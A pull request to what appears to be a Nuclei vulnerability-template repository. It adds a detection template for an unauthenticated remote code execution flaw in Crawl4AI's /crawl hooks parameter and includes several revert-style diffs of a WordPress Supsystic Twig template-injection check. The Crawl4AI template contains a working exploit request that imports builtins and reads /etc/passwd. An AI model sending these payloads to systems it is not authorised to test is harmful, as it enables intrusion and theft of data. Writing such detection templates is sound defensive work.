### PR TITLE
Add CVE-2026-26216 for remote code execution in Crawl4AI

### DIFF
--- a/http/cves/2026/CVE-2026-4257.yaml
+++ b/http/cves/2026/CVE-2026-4257.yaml
@@ -1,96 +1,75 @@
 id: CVE-2026-4257
 
 info:
-  name: WordPress Contact Form by Supsystic - Server-Side Template Injection
-  author: theamanrawat
+  name: WordPress Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection
+  author: projectdiscovery
   severity: critical
   description: |
-    Contact Form by Supsystic WordPress plugin <= 1.7.36 contains a server-side template injection caused by unsandboxed Twig_Loader_String and cfsPreFill functionality, letting unauthenticated attackers execute arbitrary code remotely via GET parameters.
-  impact: |
-    Unauthenticated attackers can execute arbitrary PHP functions and OS commands remotely, leading to full server compromise.
-  remediation: |
-    Update to the latest version beyond 1.7.36.
+    The Contact Form by Supsystic plugin for WordPress is vulnerable to Server-Side Template Injection in all versions up to, and including, 1.7.36 via the prefill functionality. This makes it possible for unauthenticated attackers to inject malicious Twig templates.
   reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-4257
     - https://patchstack.com/database/vulnerability/wordpress-contact-form-by-supsystic-plugin-1-7-36-unauthenticated-server-side-template-injection-via-prefill-functionality-vulnerability
     - https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323
-    - https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
     cve-id: CVE-2026-4257
-    epss-score: 0.41475
-    epss-percentile: 0.98558
-    cwe-id: CWE-94
+    cwe-id: CWE-1336
   metadata:
-    max-request: 7
     verified: true
+    max-request: 2
     vendor: supsystic
-    product: contact_form
+    product: contact_form_by_supsystic
     framework: wordpress
-    shodan-query: http.component:"WordPress"
-  tags: cve,cve2026,wordpress,wp-plugin,contact-form-by-supsystic,ssti,rce,twig,unauth
+    publicwww-query: "/wp-content/plugins/contact-form-by-supsystic/"
+  tags: cve,cve2026,wordpress,wp-plugin,ssti,supsystic
 
 variables:
   num1: "{{rand_int(40000, 44800)}}"
   num2: "{{rand_int(40000, 44800)}}"
-  payload: "%7B%7B{{num1}}*{{num2}}%7D%7D"
   result: "{{to_number(num1)*to_number(num2)}}"
 
 flow: |
-  http(1);
+  http(1)
   let found = [];
-  let seen = {};
-  for (let p of iterate(template["page-paths"])) {
-    if (!seen[p]) {
-      seen[p] = true;
-      found.push(p);
+  if (template.page_paths) {
+    for (let path of template.page_paths) {
+      found.push(path);
     }
   }
-  let defaults = ["/?page_id=2", "/?page_id=3", "/?page_id=4", "/?page_id=5", "/?page_id=6"];
-  for (let d of defaults) {
-    if (!seen[d]) {
-      seen[d] = true;
-      found.push(d);
-    }
+  if (found.length === 0) {
+    found.push("/?page_id=2");
   }
   for (let page of found) {
     let sep = page.includes("?") ? "&" : "?";
-    set("pagepath", page + sep + "cfsPreFill=1&first_name={{payload}}");
+    set("pagepath", page + sep);
     if (http(2)) break;
   }
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     extractors:
       - type: regex
-        name: page-paths
+        name: page_paths
         internal: true
-        group: 1
         regex:
-          - 'href="(?:https?://[^/"]+)?(/\?page_id=\d+)'
-          - 'href="(?:https?://[^/"]+)?(/[a-z][a-z0-9-]+/)'
-        part: body
+          - '(?:"|\')(/[a-zA-Z0-9-_]+/?|\/?\?page_id=\d+)(?:"|\')'
 
   - method: GET
     path:
-      - "{{BaseURL}}{{pagepath}}"
+      - "{{BaseURL}}{{pagepath}}cfsPreFill=1&first_name=%7B%7B{{num1}}*{{num2}}%7D%7D"
 
     matchers-condition: and
     matchers:
       - type: word
-        part: body
         words:
           - 'value="{{result}}"'
-
-      - type: word
-        part: body
-        words:
           - 'contact-form-by-supsystic'
+        condition: and
 
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100af93982552719052c32333a1ee079bb64428b432ef0b4cd43b86447e9d321040022036fea9aefbb44068beb773e4a642b835105a1d2ad4dd84c8e391dd29de0021ec:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-4257.yaml
+++ b/http/cves/2026/CVE-2026-4257.yaml
@@ -1,75 +1,96 @@
 id: CVE-2026-4257
 
 info:
-  name: WordPress Contact Form by Supsystic <= 1.7.36 - Unauthenticated Server-Side Template Injection
-  author: projectdiscovery
+  name: WordPress Contact Form by Supsystic - Server-Side Template Injection
+  author: theamanrawat
   severity: critical
   description: |
-    The Contact Form by Supsystic plugin for WordPress is vulnerable to Server-Side Template Injection in all versions up to, and including, 1.7.36 via the prefill functionality. This makes it possible for unauthenticated attackers to inject malicious Twig templates.
+    Contact Form by Supsystic WordPress plugin <= 1.7.36 contains a server-side template injection caused by unsandboxed Twig_Loader_String and cfsPreFill functionality, letting unauthenticated attackers execute arbitrary code remotely via GET parameters.
+  impact: |
+    Unauthenticated attackers can execute arbitrary PHP functions and OS commands remotely, leading to full server compromise.
+  remediation: |
+    Update to the latest version beyond 1.7.36.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-4257
     - https://patchstack.com/database/vulnerability/wordpress-contact-form-by-supsystic-plugin-1-7-36-unauthenticated-server-side-template-injection-via-prefill-functionality-vulnerability
     - https://plugins.trac.wordpress.org/browser/contact-form-by-supsystic/tags/1.7.36/modules/forms/views/forms.php#L323
+    - https://plugins.trac.wordpress.org/changeset/3491826/contact-form-by-supsystic
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2026-4257
-    cwe-id: CWE-1336
+    epss-score: 0.41475
+    epss-percentile: 0.98573
+    cwe-id: CWE-94
   metadata:
+    max-request: 7
     verified: true
-    max-request: 2
     vendor: supsystic
-    product: contact_form_by_supsystic
+    product: contact_form
     framework: wordpress
-    publicwww-query: "/wp-content/plugins/contact-form-by-supsystic/"
-  tags: cve,cve2026,wordpress,wp-plugin,ssti,supsystic
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2026,wordpress,wp-plugin,contact-form-by-supsystic,ssti,rce,twig,unauth
 
 variables:
   num1: "{{rand_int(40000, 44800)}}"
   num2: "{{rand_int(40000, 44800)}}"
+  payload: "%7B%7B{{num1}}*{{num2}}%7D%7D"
   result: "{{to_number(num1)*to_number(num2)}}"
 
 flow: |
-  http(1)
+  http(1);
   let found = [];
-  if (template.page_paths) {
-    for (let path of template.page_paths) {
-      found.push(path);
+  let seen = {};
+  for (let p of iterate(template["page-paths"])) {
+    if (!seen[p]) {
+      seen[p] = true;
+      found.push(p);
     }
   }
-  if (found.length === 0) {
-    found.push("/?page_id=2");
+  let defaults = ["/?page_id=2", "/?page_id=3", "/?page_id=4", "/?page_id=5", "/?page_id=6"];
+  for (let d of defaults) {
+    if (!seen[d]) {
+      seen[d] = true;
+      found.push(d);
+    }
   }
   for (let page of found) {
     let sep = page.includes("?") ? "&" : "?";
-    set("pagepath", page + sep);
+    set("pagepath", page + sep + "cfsPreFill=1&first_name={{payload}}");
     if (http(2)) break;
   }
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}"
+      - "{{BaseURL}}/"
 
     extractors:
       - type: regex
-        name: page_paths
+        name: page-paths
         internal: true
+        group: 1
         regex:
-          - '(?:"|\')(/[a-zA-Z0-9-_]+/?|\/?\?page_id=\d+)(?:"|\')'
+          - 'href="(?:https?://[^/"]+)?(/\?page_id=\d+)'
+          - 'href="(?:https?://[^/"]+)?(/[a-z][a-z0-9-]+/)'
+        part: body
 
   - method: GET
     path:
-      - "{{BaseURL}}{{pagepath}}cfsPreFill=1&first_name=%7B%7B{{num1}}*{{num2}}%7D%7D"
+      - "{{BaseURL}}{{pagepath}}"
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - 'value="{{result}}"'
+
+      - type: word
+        part: body
+        words:
           - 'contact-form-by-supsystic'
-        condition: and
 
       - type: status
         status:
           - 200
+# digest: 4a0a00473045022100d2d82886a936e8c5b913ea5f5ac84ca757265e56373d7f284182b9abdf53887f022026f791040fa0601345697383825ecc05143b37909bb0480b2bde3c297672fc66:922c64590222798bb761d5b6d8e72950

--- a/http/cves/2026/CVE-2026-4257.yaml
+++ b/http/cves/2026/CVE-2026-4257.yaml
@@ -19,7 +19,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2026-4257
     epss-score: 0.41475
-    epss-percentile: 0.98573
+    epss-percentile: 0.9857
     cwe-id: CWE-94
   metadata:
     max-request: 7
@@ -33,7 +33,6 @@ info:
 variables:
   num1: "{{rand_int(40000, 44800)}}"
   num2: "{{rand_int(40000, 44800)}}"
-  payload: "%7B%7B{{num1}}*{{num2}}%7D%7D"
   result: "{{to_number(num1)*to_number(num2)}}"
 
 flow: |
@@ -55,7 +54,7 @@ flow: |
   }
   for (let page of found) {
     let sep = page.includes("?") ? "&" : "?";
-    set("pagepath", page + sep + "cfsPreFill=1&first_name={{payload}}");
+    set("pagepath", page + sep);
     if (http(2)) break;
   }
 
@@ -76,7 +75,7 @@ http:
 
   - method: GET
     path:
-      - "{{BaseURL}}{{pagepath}}"
+      - "{{BaseURL}}{{pagepath}}cfsPreFill=1&first_name=%7B%7B{{num1}}*{{num2}}%7D%7D"
 
     matchers-condition: and
     matchers:
@@ -93,4 +92,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d2d82886a936e8c5b913ea5f5ac84ca757265e56373d7f284182b9abdf53887f022026f791040fa0601345697383825ecc05143b37909bb0480b2bde3c297672fc66:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502204ac1d68023785ab4e32a7d1e198b2902882c5d04211b48e1e279aa5b50d832c7022100d665c29b33de448d4c9b124964e51589ef73762cbd86711aa56e105c62e21ede:922c64590222798bb761d5b6d8e72950

--- a/http:/cves/2026/CVE-2026-26216.yaml
+++ b/http:/cves/2026/CVE-2026-26216.yaml
@@ -1,0 +1,61 @@
+id: CVE-2026-26216
+
+info:
+  name: Crawl4AI < 0.8.0 - Unauthenticated Remote Code Execution via Hooks Parameter
+  author: dishantmodi
+  severity: critical
+  description: |
+    Crawl4AI versions prior to 0.8.0 contain a remote code execution vulnerability in the Docker API deployment.
+    The /crawl endpoint accepts a hooks parameter containing Python code that is executed using exec().
+    The __import__ builtin was included in the allowed builtins, allowing unauthenticated remote attackers to
+    import arbitrary modules and execute system commands. Successful exploitation allows full server compromise,
+    including arbitrary command execution, file read and write access, sensitive data exfiltration, and lateral
+    movement within internal networks.
+  remediation: |
+    Upgrade to Crawl4AI 0.8.0 or later, which removes __import__ from allowed_builtins in hook_manager.py and
+    disables hooks by default (CRAWL4AI_HOOKS_ENABLED=false). As an interim mitigation, disable the Docker API
+    deployment or restrict network access to it and add authentication.
+  impact: |
+    An unauthenticated attacker can achieve full server compromise: arbitrary command execution, file read/write,
+    exfiltration of environment variables and API keys, and lateral movement into internal networks.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26216
+    - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-5882-5rx9-xgxp
+    - https://www.vulncheck.com/advisories/crawl4ai-docker-api-unauthenticated-remote-code-execution-via-hooks-parameter
+    - https://github.com/unclecode/crawl4ai/blob/main/docs/blog/release-v0.8.0.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-26216
+    cwe-id: CWE-94
+
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.html:"Crawl4AI"
+  tags: cve,cve2026,crawl4ai,rce,python
+
+http:
+  - raw:
+      - |
+        POST /crawl HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"urls":["http://seedportal/"],"hooks":{"code":{"on_page_context_created":"async def hook(page, context, **kwargs):\n    _builtins = __import__('builtins')\n    with _builtins.open('/etc/passwd', 'r') as _f:\n        _data = _f.read(300)\n    _os = __import__('os')\n    raise _os.error('AEV-CANARY-{{randstr}}-' + _data)\n    return page"},"timeout":30}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "AEV-CANARY-{{randstr}}-root:x:0:0"
+
+      - type: word
+        part: content_type
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
## Added CVE-2026-26216                                                                                                                                                                  
                                                                                                                                                                                              
     CVE: CVE-2026-26216                                                                                                                                                                  
     Product: Crawl4AI < 0.8.0 (Docker API deployment)                                                                                                                                    
     Type: Unauthenticated RCE via `/crawl` hooks parameter                                                                                                                               
                                                                                                                                                                                              
     References                                                                                                                                                                           
     - https://nvd.nist.gov/vuln/detail/CVE-2026-26216                                                                                                                                        
     - https://github.com/unclecode/crawl4ai/security/advisories/GHSA-5882-5rx9-xgxp                                                                                                          
     - https://www.vulncheck.com/advisories/crawl4ai-docker-api-unauthenticated-remote-code-execution-via-hooks-parameter                                                                     
                                                                                                                                                                                              
      Template details                                                                                                                                                                     
     - Active template with file-read canary (`/etc/passwd`)                                                                                                                                  
     - Uses `__import__('builtins').open` to bypass `allowed_builtins` restriction                                                                                                            
     - Tested against official `unclecode/crawl4ai:0.7.8` image